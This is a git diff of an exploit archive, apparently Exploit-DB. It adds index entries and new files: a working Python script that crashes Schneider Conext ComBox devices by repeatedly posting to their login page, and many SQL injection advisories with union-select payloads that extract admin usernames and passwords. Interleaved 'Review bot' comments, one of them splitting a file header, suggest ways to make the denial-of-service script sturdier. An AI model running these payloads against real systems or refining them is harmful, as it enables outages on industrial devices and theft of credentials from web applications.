 41439,platforms/linux/shellcode/41439.c,"Linux/x86-64 - Egghunter Shellcode (38 bytes)",2017-02-23,odzhancode,linux,shellcode,0
 41467,platforms/win_x86/shellcode/41467.c,"Windows x86 - Executable Directory Search Shellcode (130 bytes)",2017-02-26,"Krzysztof Przybylski",win_x86,shellcode,0
-41468,platforms/lin_x86-64/shellcode/41468.nasm,"Linux/x86_64 - Random Listener Shellcode (54 bytes)",2017-02-26,"Robert L. Taylor",lin_x86-64,shellcode,0
+41468,platforms/lin_x86-64/shellcode/41468.nasm,"Linux/x86-64 - Random Listener Shellcode (54 bytes)",2017-02-26,"Robert L. Taylor",lin_x86-64,shellcode,0
 41477,platforms/linux/shellcode/41477.c,"Linux/x86-64 - Reverse Shell Shellcode (84 bytes)",2017-02-28,"Manuel Mancera",linux,shellcode,0
 41481,platforms/win_x86/shellcode/41481.asm,"Windows x86 - Reverse TCP Staged Alphanumeric Shellcode (332 Bytes)",2017-03-01,"Snir Levi",win_x86,shellcode,0
 41498,platforms/lin_x86-64/shellcode/41498.nasm,"Linux/x86-64 - Polymorphic Setuid(0) & Execve(/bin/sh) Shellcode (31 bytes)",2017-03-03,"Robert L. Taylor",lin_x86-64,shellcode,0
@@ -37415,7 +37418,7 @@ id,file,description,date,author,platform,type,port
 41494,platforms/php/webapps/41494.txt,"Joomla! Component StreetGuessr Game 1.0 - SQL Injection",2017-03-02,"Ihsan Sencan",php,webapps,0
 41495,platforms/php/webapps/41495.txt,"Joomla! Component Guesser 1.0.4 - 'type' Parameter SQL Injection",2017-03-02,"Ihsan Sencan",php,webapps,0
 41496,platforms/php/webapps/41496.txt,"Joomla! Component Recipe Manager 2.2 - 'id' Parameter SQL Injection",2017-03-02,"Ihsan Sencan",php,webapps,0
-41497,platforms/php/webapps/41497.php,"Wordpress < 4.7.1 - Username Enumeration",2017-03-03,Dctor,php,webapps,0
+41497,platforms/php/webapps/41497.php,"WordPress < 4.7.1 - Username Enumeration",2017-03-03,Dctor,php,webapps,0
 41499,platforms/jsp/webapps/41499.txt,"NetGain Enterprise Manager 7.2.562 - 'Ping' Command Injection",2017-02-23,MrChaZ,jsp,webapps,0
 41500,platforms/php/webapps/41500.txt,"Joomla! Component Coupon 3.5 - SQL Injection",2017-03-03,"Ihsan Sencan",php,webapps,0
 41501,platforms/php/webapps/41501.txt,"pfSense 2.3.2 - Cross-Site Scripting / Cross-Site Request Forgery",2017-03-03,"Yann CAM",php,webapps,0
@@ -37425,3 +37428,31 @@ id,file,description,date,author,platform,type,port
 41506,platforms/php/webapps/41506.txt,"Joomla! Component AYS Quiz 1.0 - 'id' Parameter SQL Injection",2017-03-04,"Ihsan Sencan",php,webapps,0
 41507,platforms/php/webapps/41507.txt,"Joomla! Component Content ConstructionKit 1.1 - SQL Injection",2017-03-04,"Ihsan Sencan",php,webapps,0
 41508,platforms/php/webapps/41508.txt,"Joomla! Component AltaUserPoints 1.1 - 'userid' Parameter SQL Injection",2017-03-04,"Ihsan Sencan",php,webapps,0
+41512,platforms/php/webapps/41512.txt,"Advanced Bus Booking Script 2.04 - SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0
+41513,platforms/php/webapps/41513.txt,"Entrepreneur Bus Booking Script 3.03 - 'hid_Busid' Parameter SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0
+41514,platforms/php/webapps/41514.txt,"Single Theater Booking Script - 'newsid' Parameter SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0
+41515,platforms/php/webapps/41515.txt,"Responsive Events & Movie Ticket Booking Script - SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0
+41516,platforms/php/webapps/41516.txt,"Online Cinema and Event Booking Script 2.01 - 'newsid' Parameter SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0
+41517,platforms/php/webapps/41517.txt,"Redbus Clone Script 3.05 - 'hid_Busid' Parameter SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0
+41518,platforms/php/webapps/41518.txt,"Groupon Clone Script 3.01 - 'catid' Parameter SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0
+41519,platforms/php/webapps/41519.txt,"Naukri Clone Script 3.02 - 'type' Parameter SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0
+41520,platforms/php/webapps/41520.txt,"Yellow Pages Clone Script 1.3.4 - SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0
+41521,platforms/php/webapps/41521.txt,"Advanced Matrimonial Script 2.0.3 - SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0
+41522,platforms/php/webapps/41522.txt,"Advanced Real Estate Script 4.0.6 - SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0
+41523,platforms/php/webapps/41523.txt,"PHP Classifieds Rental Script 3.6.0 - 'scatid' Parameter SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0
+41524,platforms/php/webapps/41524.txt,"Entrepreneur B2B Script 2.0.4 - 'id' Parameter SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0
+41525,platforms/php/webapps/41525.txt,"PHP Matrimonial Script 3.0 - SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0
+41526,platforms/php/webapps/41526.txt,"MLM Binary Plan Script 2.0.5 - SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0
+41527,platforms/php/webapps/41527.txt,"MLM Forced Matrix 2.0.7 - SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0
+41528,platforms/php/webapps/41528.txt,"MLM Forex Market Plan Script 2.0.1 - SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0
+41529,platforms/php/webapps/41529.txt,"MLM Membership Plan Script 2.0.5 - SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0
+41530,platforms/php/webapps/41530.txt,"Multireligion Responsive Matrimonial Script 4.7.1 - SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0
+41531,platforms/php/webapps/41531.txt,"Network Community Script 3.0.2 - SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0
+41532,platforms/php/webapps/41532.txt,"PHP B2B Script 3.05 - SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0
+41533,platforms/php/webapps/41533.txt,"Responsive Matrimonial Script 4.0.1 - SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0
+41534,platforms/php/webapps/41534.txt,"Schools Alert Management Script 2.01 - 'list_id' Parameter SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0
+41535,platforms/php/webapps/41535.txt,"Select Your College Script 2.01 - SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0
+41536,platforms/php/webapps/41536.txt,"Social Network Script 3.01 - 'id' Parameter SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0
+41539,platforms/php/webapps/41539.txt,"Website Broker Script 3.02 - 'view' Parameter SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0
+41540,platforms/php/webapps/41540.py,"WordPress Multiple Plugins - Arbitrary File Upload",2017-03-03,"The Martian",php,webapps,0
+41541,platforms/json/webapps/41541.html,"Deluge Web UI 1.3.13 - Cross-Site Request Forgery",2017-03-06,"Kyle Neideck",json,webapps,0
diff --git a/platforms/hardware/dos/41537.py b/platforms/hardware/dos/41537.py
new file mode 100755
index 000000000..400e0aacc
--- /dev/null
+++ b/platforms/hardware/dos/41537.py
@@ -0,0 +1,44 @@
+#Exploit Title: Conext ComBox - Denial of Service (HTTP-POST)
+#Description: The exploit cause the device to self-reboot, constituting a denial of service.
+#Google Dork: "Conext ComBox" + "JavaScript was not detected" /OR/ "Conext ComBox" + "Recover Lost Password"
+#Date: March 02, 2017
+#Exploit Author: Mark Liapustin & Arik Kublanov
+#Vendor Homepage: http://solar.schneider-electric.com/product/conext-combox/
+#Software Link: http://cdn.solar.schneider-electric.com/wp-content/uploads/2016/06/conext-combox-data-sheet-20160624.pdf
+#Version: All firmware versions prior to V3.03 BN 830
+#Tested on: Windows and Linux
+#CVE: CVE-2017-6019
+
+# Use this script with caution!
+# Mark Liapustin: https://www.linkedin.com/in/clizsec/
+# Arik Kublanov: https://www.linkedin.com/in/arik-kublanov-57618a64/
+# =========================================================
+import subprocess
+import os
+import sys
+import time
+import socket
+# =========================================================
+
+print 'Usage: python ComBoxDos.py IP PORT'
+print 'Number of arguments:', len(sys.argv), 'arguments.'
+print 'Argument List:', str(sys.argv)
+
+print "ComBox Denial of Service via HTTP-POST Request"
+global cmdosip
+cmdosip = str(sys.argv[1])
+port = int(sys.argv[2])
+print "[!] The script will cause the Conext ComBox device to crash and to reboot itself."
+
+print "Executing...\n\n\n"
+for i in range(1, 1000):
+ try:
+ cmdosdir = "login.cgi?login_username=Nation-E&login_password=DOS&submit=Log+In"
+ s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+ s.connect((cmdosip, port))
+ print "[+] Sent HTTP POST Request to: " + cmdosip + " with /" + cmdosdir + " HTTP/1.1"
+ s.send("POST /" + cmdosdir + " HTTP/1.1\r\n")
+ s.send("Host: " + cmdosip + "\r\n\r\n")
+ s.close()
+ except:
+ pass
diff --git a/platforms/json/webapps/41541.html b/platforms/json/webapps/41541.html
new file mode 100755
index 000000000..5e0057d37
--- /dev/null
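Review bot: The bare `except: pass` at the end of the loop catches everything, including KeyboardInterrupt, so a wrong host or port produces no output at all and the 999-iteration loop cannot be stopped with Ctrl-C; narrowing it to `except socket.error: pass` and closing the socket in a `finally:` keeps the best-effort send without hiding errors. The usage line is printed but `len(sys.argv)` is never checked before `sys.argv[1]` and `sys.argv[2]` are read, so a missing argument ends in an IndexError traceback rather than the usage message; `if len(sys.argv) != 3: sys.exit('Usage: python ComBoxDos.py IP PORT')` ahead of the assignments fixes that. `subprocess`, `os` and `time` are imported but never used, the module-level `global cmdosip` is a no-op, and the `print` statements tie the script to Python 2. In the header comment, 'The exploit cause the device' should read 'causes'.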
+++ b/platforms/json/webapps/41541.html
@@ -0,0 +1,173 @@ + + + + + +
diff --git a/platforms/php/webapps/41497.php b/platforms/php/webapps/41497.php
index a740d9cb1..00531c6a4 100755
--- a/platforms/php/webapps/41497.php
+++ b/platforms/php/webapps/41497.php
@@ -8,7 +8,7 @@ header ('Content-type: text/html; charset=UTF-8');
-$url= "https://bucaneiras.org/";
+$url= "http://localhost/";
 $payload="wp-json/wp/v2/users/";
 $urli = file_get_contents($url.$payload);
 $json = json_decode($urli, true);
diff --git a/platforms/php/webapps/41512.txt b/platforms/php/webapps/41512.txt
new file mode 100755
index 000000000..b5431f3c8
--- /dev/null
+++ b/platforms/php/webapps/41512.txt
@@ -0,0 +1,20 @@
+# # # # #
+# Exploit Title: Advanced Bus Booking Script v2.04 - SQL Injection
+# Google Dork: N/A
+# Date: 06.03.2017
+# Vendor Homepage: http://www.phpscriptsmall.com/
+# Software : http://www.phpscriptsmall.com/product/advanced-bus-booking-script/
+# Demo: http://travelbookingscript.com/demo/newbusbooking/
+# Version: 2.04
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/available_seat.php?hid_Busid=[SQL]
+# http://localhost/[PATH]/seatcheck.php?busid=[SQL]
+# http://localhost/[PATH]/seatcheck.php?seat=[SQL]
+# http://localhost/[PATH]/seatcheck.php?seat=1&busid=1&dat=[SQL]
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41513.txt b/platforms/php/webapps/41513.txt
new file mode 100755
index 000000000..6a2346021
--- /dev/null
+++ b/platforms/php/webapps/41513.txt
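Review bot: `$urli = file_get_contents($url.$payload);` on the line after the changed one has no failure check: on a connection or HTTP error it returns `false`, `json_decode(false, true)` yields `null`, and whatever consumes `$json` below the hunk runs on a null value; `if ($urli === false) { exit("request failed\n"); }` between those two lines stops that with a clear message. The rest of the script lies outside the hunk.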
@@ -0,0 +1,18 @@
+# # # # #
+# Exploit Title: Entrepreneur Bus Booking Script v3.03 - SQL Injection
+# Google Dork: N/A
+# Date: 06.03.2017
+# Vendor Homepage: http://www.phpscriptsmall.com/
+# Software : http://www.phpscriptsmall.com/product/entrepreneur-bus-booking-script/
+# Demo: http://travelbookingscript.com/demo/busbooking/
+# Version: 3.03
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/available_seat.php?hid_Busid=[SQL]
+# # # # #
+
diff --git a/platforms/php/webapps/41514.txt b/platforms/php/webapps/41514.txt
new file mode 100755
index 000000000..f5d65b5f1
--- /dev/null
+++ b/platforms/php/webapps/41514.txt
@@ -0,0 +1,27 @@
+# # # # #
+# Exploit Title: Single Theater Booking Script - SQL Injection
+# Google Dork: N/A
+# Date: 06.03.2017
+# Vendor Homepage: http://www.phpscriptsmall.com/
+# Software : http://www.phpscriptsmall.com/product/single-theater-booking-script/
+# Demo: http://www.theaterbookingscript.com/demo/theater-booking/single-theater/
+# Version: N/A
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/news_desc.php?newsid=[SQL]
+# For example;
+# -7'+/*!50000union*/+select+1,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),3,4,5,6-- -
+# users :user_id
+# users :email
+# users :user_name
+# users :password
+# users :mobile
+# users :country
+# users :state
+# -7'+/*!13337union*/+select+1,/*!13337concat*/(0x496873616e2053656e63616e203c62723e,user_name,0x3a,password),3,4,5,6+from+users-- -
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41515.txt b/platforms/php/webapps/41515.txt
new file mode 100755
index 000000000..ae48207cb
--- /dev/null
+++ b/platforms/php/webapps/41515.txt
@@ -0,0 +1,27 @@
+# # # # #
+# Exploit Title: Responsive Events & Movie Ticket Booking Script - SQL Injection
+# Google Dork: N/A
+# Date: 06.03.2017
+# Vendor Homepage: http://www.phpscriptsmall.com/
+# Software : http://www.phpscriptsmall.com/product/responsive-events-movie-ticket-booking-script/
+# Demo: http://theaterbookingscript.com/demo/advanced-ticketbooking/
+# Version: N/A
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/news_desc.php?newsid=[SQL]
+# For example;
+# -7'+/*!50000union*/+select+1,0x496873616e2053656e63616e3c62723e7777772e696873616e2e6e6574,3,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),5,6-- -
+# users :user_id
+# users :email
+# users :user_name
+# users :password
+# users :mobile
+# users :country
+# users :state
+# -7'+/*!50000union*/+select+1,0x496873616e2053656e63616e3c62723e7777772e696873616e2e6e6574,3,/*!13337Concat*/(user_name,0x3a,password),5,6+from+users-- -
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41516.txt b/platforms/php/webapps/41516.txt
new file mode 100755
index 000000000..9063f1846
--- /dev/null
+++ b/platforms/php/webapps/41516.txt
@@ -0,0 +1,27 @@
+# # # # #
+# Exploit Title: Online Cinema and Event Booking Script v2.01 - SQL Injection
+# Google Dork: N/A
+# Date: 06.03.2017
+# Vendor Homepage: http://www.phpscriptsmall.com/
+# Software : http://www.phpscriptsmall.com/product/online-cinema-and-event-booking-script/
+# Demo: http://theaterbookingscript.com/demo/events-movie/
+# Version: 2.01
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/news_desc.php?newsid=[SQL]
+# For example;
+# -7'+/*!50000union*/+select+1,0x496873616e2053656e63616e3c62723e7777772e696873616e2e6e6574,3,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),5,6-- -
+# users :user_id
+# users :email
+# users :user_name
+# users :password
+# users :mobile
+# users :country
+# users :state
+# -7'+/*!50000union*/+select+1,0x496873616e2053656e63616e3c62723e7777772e696873616e2e6e6574,3,/*!13337Concat*/(user_name,0x3a,password),5,6+from+users-- -
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41517.txt b/platforms/php/webapps/41517.txt
new file mode 100755
index 000000000..ddd3f2c28
--- /dev/null
+++ b/platforms/php/webapps/41517.txt
@@ -0,0 +1,17 @@
+# # # # #
+# Exploit Title: Redbus Clone Script v3.05 - SQL Injection
+# Google Dork: N/A
+# Date: 06.03.2017
+# Vendor Homepage: http://www.phpscriptsmall.com/
+# Software : http://www.phpscriptsmall.com/product/redbus-clone/
+# Demo: http://198.38.86.159/~materialmag/demo/redbus-clone-responsive/
+# Version: 3.05
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/available_seat.php?hid_Busid=[SQL]
+# # # # #
diff --git a/platforms/php/webapps/41518.txt b/platforms/php/webapps/41518.txt
new file mode 100755
index 000000000..dd2e36909
--- /dev/null
+++ b/platforms/php/webapps/41518.txt
@@ -0,0 +1,25 @@
+# # # # #
+# Exploit Title: Groupon Clone Script v3.01 - SQL Injection
+# Google Dork: N/A
+# Date: 06.03.2017
+# Vendor Homepage: http://www.phpscriptsmall.com/
+# Software : http://www.phpscriptsmall.com/product/groupon-clone-script/
+# Demo: http://phpscriptsmall.info/demo/groupon-deal/
+# Version: 3.01
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/product-show.php?catid=[SQL]
+# For example;
+# -40+/*!50000union*/+select+1,2,3,4,5,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22-- -
+# admin :admin_id
+# admin :user
+# admin :pass
+# admin :address
+# admin :mobile
+# -40+/*!50000union*/+select+1,2,3,4,5,/*!50000concat*/(user,0x3a,pass),7,8,9,10,11,12,13,14,15,16,0x496873616e2053656e63616e203c62723e7777772e696873616e2e6e6574,18,19,20,21,22+from+admin-- -
+# # # # #
diff --git a/platforms/php/webapps/41519.txt b/platforms/php/webapps/41519.txt
new file mode 100755
index 000000000..b11d97703
--- /dev/null
+++ b/platforms/php/webapps/41519.txt
@@ -0,0 +1,19 @@
+# # # # #
+# Exploit Title: Naukri Clone Script v3.02 - SQL Injection
+# Google Dork: N/A
+# Date: 06.03.2017
+# Vendor Homepage: http://www.phpscriptsmall.com/
+# Software : http://phpscriptsmall.com/product/naukri-clone-script/
+# Demo: http://phpscriptsmall.biz/demo/jobsite/
+# Version: 3.02
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/placement.php?type=[SQL]
+# -1'+/*!50000union*/+select+1,@@version,3,4,5,6,7,8-- -
+# Etc...
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41520.txt b/platforms/php/webapps/41520.txt
new file mode 100755
index 000000000..b7e27e5e0
--- /dev/null
+++ b/platforms/php/webapps/41520.txt
@@ -0,0 +1,22 @@
+# # # # #
+# Exploit Title: Yellow Pages Clone Script v1.3.4 - SQL Injection
+# Google Dork: N/A
+# Date: 06.03.2017
+# Vendor Homepage: http://www.phpscriptsmall.com/
+# Software : http://www.phpscriptsmall.com/product/yellow-pages-clone-script/
+# Demo: http://dexteritysolution.com/demo/directory/
+# Version: 1.3.4
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/testmonial.php?blogid=[SQL]
+# -2'+/*!50000union*/+select+1,@@version,0x496873616e2053656e63616e203c62723e7777772e696873616e2e6e6574,4,5,6-- -
+# http://localhost/[PATH]/blog.php?blogid=[SQL]
+# -2'+/*!50000union*/+select+1,@@version,3,4,0x496873616e2053656e63616e203c62723e7777772e696873616e2e6e6574,6,7,8,9,10,11,12-- -
+# Etc...
+# # # # #
+
diff --git a/platforms/php/webapps/41521.txt b/platforms/php/webapps/41521.txt
new file mode 100755
index 000000000..705713d00
--- /dev/null
+++ b/platforms/php/webapps/41521.txt
@@ -0,0 +1,31 @@
+# # # # #
+# Exploit Title: Advanced Matrimonial Script v2.0.3 - SQL Injection
+# Google Dork: N/A
+# Date: 06.03.2017
+# Vendor Homepage: http://www.phpscriptsmall.com/
+# Software : http://www.phpscriptsmall.com/product/advanced-matrimonial/
+# Demo: http://74.124.215.220/~admatrimon/
+# Version: 2.0.3
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/photoalbum.php?userid=[SQL]
+# http://localhost/[PATH]/members_result.php?match_result=[SQL]
+# http://localhost/[PATH]/search_result.php?cityse=Basic+Search&gender=Male&age_from=[SQL]&marital=[SQL]&religion=[SQL]&caste=[SQL]&country=[SQL]&education=[SQL]&Submit=Search
+# For example;
+# photoalbum.php?userid=-22'+/*!50000union*/+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),86,87,88,89-- -
+# status:adminlogin
+# admin_id:adminlogin
+# admin_username:adminlogin
+# admin_password:adminlogin
+# admin_email:adminlogin
+# photoalbum.php?userid=-22'+/*!50000union*/+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,/*!50000concat(*/admin_username,/*!50000char*/(58),admin_password),86,87,88,89+from+adminlogin-- -
+#
+#
+#
+# Etc... Etc...
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41522.txt b/platforms/php/webapps/41522.txt
new file mode 100755
index 000000000..586ded134
--- /dev/null
+++ b/platforms/php/webapps/41522.txt
@@ -0,0 +1,24 @@
+# # # # #
+# Exploit Title: Advanced Real Estate Script v4.0.6 - SQL Injection
+# Google Dork: N/A
+# Date: 06.03.2017
+# Vendor Homepage: http://www.phpscriptsmall.com/
+# Software : http://www.phpscriptsmall.com/product/advanced-real-estate-script/
+# Demo: http://www.phprealestatescript.org/advanced_realestate/
+# Version: 4.0.6
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/state.php?country=[SQL]
+# http://localhost/[PATH]/city.php?city=[SQL]
+# http://localhost/[PATH]/locat.php?locat=[SQL]
+# For example;
+# -1'+/*!50000union*/+select+1,2,3,4,@@version,6-- -
+# -1'+/*!50000union*/+select+1,2,3,4,5,@@version,7,8,9-- -
+# -1'+/*!50000union*/+select+1,2,3,4,5,6,@@version,8-- -
+# Etc... Etc...
+# # # # #
diff --git a/platforms/php/webapps/41523.txt b/platforms/php/webapps/41523.txt
new file mode 100755
index 000000000..44d282428
--- /dev/null
+++ b/platforms/php/webapps/41523.txt
@@ -0,0 +1,25 @@
+# # # # #
+# Exploit Title: PHP Classifieds Rental Script v3.6.0 - SQL Injection
+# Google Dork: N/A
+# Date: 06.03.2017
+# Vendor Homepage: http://www.phpscriptsmall.com/
+# Software : http://www.phpscriptsmall.com/product/php-classifieds-rental-script/
+# Demo: http://198.38.86.159/~classifiedscript/
+# Version: 3.6.0
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/viewsubproducts.php?scatid=[SQL]
+# For example;
+# -2'+/*!50000union*/+select+1,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64-- -
+# admin:admin_id
+# admin:admin_name
+# admin:username
+# admin:adminpassword
+# -2'+/*!50000union*/+select+1,/*!50000concat*/(username,0x3a,adminpassword),3,4,0x496873616e2053656e63616e207777772e696873616e2e6e6574,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64+from+admin-- -
+# Etc...
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41524.txt b/platforms/php/webapps/41524.txt
new file mode 100755
index 000000000..cd462cbf5
--- /dev/null
+++ b/platforms/php/webapps/41524.txt
@@ -0,0 +1,30 @@
+# # # # #
+# Exploit Title: Entrepreneur B2B Script v2.0.4 - SQL Injection
+# Google Dork: N/A
+# Date: 06.03.2017
+# Vendor Homepage: http://www.phpscriptsmall.com/
+# Software : http://www.phpscriptsmall.com/product/entrepreneur-b2b-script/
+# Demo: http://www.readymadeb2bscript.com/demo/entre-monicab2b/
+# Version: 2.0.4
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/news-details.php?id=[SQL]
+# For example;
+# -54'+/*!50000union*/+select+1,2,0x496873616e2053656e63616e203c62723e7777772e696873616e2e6e6574,4,5,6,7,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),9,10,11,12,13,14,15--+-
+# admin :id
+# admin :title
+# admin :name
+# admin :last_name
+# admin :company
+# admin :sex
+# admin :username
+# admin :password
+# admin :ref_password
+# -54'+/*!50000union*/+select+1,2,0x496873616e2053656e63616e203c62723e7777772e696873616e2e6e6574,4,5,6,7,/*!50000concat*/(username,0x3a,password),9,10,11,12,13,14,15+from+admin--+-
+# Etc...
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41525.txt b/platforms/php/webapps/41525.txt
new file mode 100755
index 000000000..eccfdaba3
--- /dev/null
+++ b/platforms/php/webapps/41525.txt
@@ -0,0 +1,26 @@
+# # # # #
+# Exploit Title: Matrimonial Script v3.0 - SQL Injection
+# Google Dork: N/A
+# Date: 06.03.2017
+# Vendor Homepage: http://www.phpscriptsmall.com/
+# Software : http://www.phpscriptsmall.com/product/matrimonial-script/
+# Demo: http://74.124.215.220/~matriialscrip/
+# Version: 3.0
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/mother_tongue_search.php?/IhsanSencan&id=[SQL]
+# http://localhost/[PATH]/mother_tongue_search.php?/index_search_result.php?smart_search_gender=[SQL]Male&in_age_from=[SQL]18&in_age_to=[SQL]45&in_religion=[SQL]&in_mother=[SQL]&in_caste=[SQL]&in_country=[SQL]
+# For example;
+# -8'+/*!50000union*/+select+1,2,3,0x496873616e2053656e63616e3c62723e7777772e696873616e2e6e6574,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54--+-
+# adminlogin :id
+# adminlogin :userid
+# adminlogin :password
+# adminlogin :email
